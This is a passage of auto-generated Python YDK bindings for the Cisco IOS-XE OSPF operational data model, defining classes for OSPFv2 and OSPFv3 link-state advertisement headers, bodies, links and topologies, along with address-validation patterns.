self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
"""
Network details
.. attribute:: network_mask
IP network mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
"""
Router LSA link
.. attribute:: link_id (key)
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
Link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_topology
Topology specific information
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
"""
Topology specific information
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
"""
Summary LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
